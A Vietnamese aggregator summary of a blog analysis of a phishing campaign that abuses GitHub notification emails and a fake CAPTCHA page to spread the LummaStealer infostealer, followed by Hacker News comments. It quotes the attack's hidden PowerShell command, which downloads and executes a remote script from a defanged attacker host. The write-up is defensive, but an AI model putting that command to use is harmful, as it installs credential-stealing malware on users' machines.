Vụ phát tán mã độc lợi dụng email thông báo của GitHub

 (ianspence.com)
1 điểm bởi GN⁺ 2024-09-20 | 1 bình luận | Chia sẻ qua WhatsApp
  • Với tư cách là một lập trình viên mã nguồn mở, bạn thường xuyên nhận email từ GitHub
  • Phần lớn email là email thông báo cho biết các tương tác của người dùng GitHub
  • Tuy nhiên, một số email giả mạo bộ phận bảo mật của GitHub để khiến người dùng tải mã độc

Cách tấn công

  1. Kẻ tấn công dùng tài khoản GitHub tạm thời để tạo issue trong kho lưu trữ công khai
  2. Kẻ tấn công nhanh chóng xóa issue
  3. Chủ sở hữu kho lưu trữ nhận được email thông báo
  4. Nhấp vào liên kết trong email
  5. Làm theo chỉ dẫn và khiến hệ thống bị lây nhiễm mã độc

Phân tích nội dung email

  • Phần lớn nội dung email có thể bị kẻ tấn công kiểm soát
  • Email không hề cho biết rằng một issue mới đã được tạo
  • Kẻ tấn công mạo danh "Github Security Team"
  • Vì email thực sự được gửi từ GitHub nên vượt qua được các bước kiểm tra phishing

Điểm GitHub có thể cải thiện

  • Cung cấp thêm ngữ cảnh trong email có thể làm giảm hiệu quả của cuộc tấn công
  • Cần giảm bớt nội dung mà kẻ tấn công có thể kiểm soát và làm rõ hơn về người gửi

Trang web

  • Khi đi theo liên kết trong email, người dùng được đưa tới một trang CAPTCHA
  • Trang CAPTCHA dụ người dùng nhập lệnh vào hộp thoại Run của Windows

Mã độc

  • Trang web sao chép lệnh sau vào clipboard: 
    powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content"
  • Lệnh này khởi chạy tiến trình PowerShell rồi tải và thực thi script

Các giai đoạn của mã độc

  1. Tải và thực thi script thông qua lệnh PowerShell
  2. Script tải xuống và chạy tệp thực thi độc hại
  3. Tệp thực thi có chữ ký số nhưng không hợp lệ
  4. Windows không cảnh báo về chữ ký không hợp lệ

Điểm yếu của Windows

  • Cờ "Mark of the Web" (MOTW) dùng để nhận diện tệp tải từ Internet không được thiết lập
  • Lớp System.Net.WebClient của .NET Framework không thiết lập cờ MOTW
  • Khi cờ MOTW không được thiết lập, Windows sẽ không cảnh báo về chữ ký không hợp lệ

Phân tích mã độc

  • Mã độc được nạp vào bộ nhớ rồi thực thi
  • Đây là mã độc có tên LummaStealer, dùng để đánh cắp ví tiền mã hóa, thông tin xác thực đã lưu và nhiều dữ liệu khác

Kết luận

  • Đây là một trường hợp tấn công khai thác điểm yếu của email thông báo GitHub
  • Việc phân tích được thực hiện bằng nhiều công cụ khác nhau

Tóm tắt của GN⁺

  • Bài viết này nói về một vụ tấn công mã độc khai thác email thông báo của GitHub
  • Kẻ tấn công phát tán mã độc bằng cách lợi dụng điểm yếu trong hệ thống email của GitHub
  • Chúng khai thác điểm yếu trong cờ "Mark of the Web" của Windows và cơ chế kiểm tra chữ ký số
  • Mã độc được sử dụng là LummaStealer
  • Đây là các điểm yếu đã được báo cáo cho GitHub và Microsoft
  • Với các dự án khác có chức năng tương tự, bài viết gợi ý tham khảo tài liệu phân tích của Cyfirma

Bài viết liên quan

1 bình luận

 
GN⁺ 2024-09-20
Ý kiến Hacker News

  • Gần đây tôi nhận được một email rất thuyết phục từ PayPal

    • Có người đã dùng tính năng trích dẫn để đặt tên công ty thành "PayPal need to get in touch about a your recent payment of $499.00, please call +1-...."
    • Email đến từ chính PayPal.com, và tôi không hiểu vì sao họ lại không kiểm soát những tên người dùng như vậy
    • Tôi đã báo cáo việc này nhưng vẫn chưa nhận được phản hồi
    • Email được định dạng để trông như email PayPal thật, nên có lẽ rất nhiều người sẽ mắc lừa

  • Tôi tự hỏi liệu mọi người có thật sự bị lừa bởi kiểu scam như thế này không

    • Giả sử họ biết email này đến từ github
    • Dấu hiệu cảnh báo đầu tiên: email dẫn tới một biến thể của tên miền thật
    • Dấu hiệu cảnh báo thứ hai: captcha yêu cầu nhập lệnh shell

  • Có vẻ như các lập trình viên junior có thể mắc lừa kiểu này

    • "Ồ, giải captcha bằng cách chạy code à, đúng là thú vị thật!"

  • Một trang web không nên có khả năng chỉ bằng một cú nhấp là điền sẵn bộ nhớ đệm sao chép/dán

    • Không nên nhấp vào liên kết trong email hoặc tin tưởng nội dung email
    • Việc Windows vẫn cho phép quyền root chỉ với một dòng lệnh PowerShell là vấn đề

  • Github nên chặn các dịch vụ tự động chèn liên kết vào issue mà không kiểm tra liên kết

    • Github nên kiểm soát tốt hơn những gì họ gửi qua email

  • Tôi tự hỏi liệu github-scanner.com có còn là một bên độc hại hay không

    • Cloudflare đang lưu trữ DNS và không có cách nào để báo cáo vấn đề này

  • Kẻ tấn công đã xóa issue rất nhanh

    • Chỉ quản trị viên mới có thể xóa issue
    • Vì vậy trong kho lưu trữ vẫn còn dấu vết của issue đó

  • Bài viết hay, mang lại cảm giác giống blog của Julia Evans

  • Thật buồn khi đến năm 2024 vẫn còn người bị lừa bởi những chiêu trò đơn giản nhất

  • Sáng nay tôi cũng nhận được một thông báo như vậy và đã bỏ qua

    • Thông báo đó liên quan đến một kho lưu trữ cụ thể

  • Đáng để đọc, nó cho thấy họ đang cố làm gì

    • Chỉ riêng liên kết thôi cũng đã đủ đáng ngờ, nhưng xem ai đó đào sâu vụ này cũng khá thú vị

  • Tôi cũng đã nhận được một email thông báo GitHub tương tự

    • Nó nói rằng đã phát hiện lỗ hổng trong kho lưu trữ, nhưng tôi không nhấp vào
    • Vì tôi là một lập trình viên lười nên đã không nhấp vào đó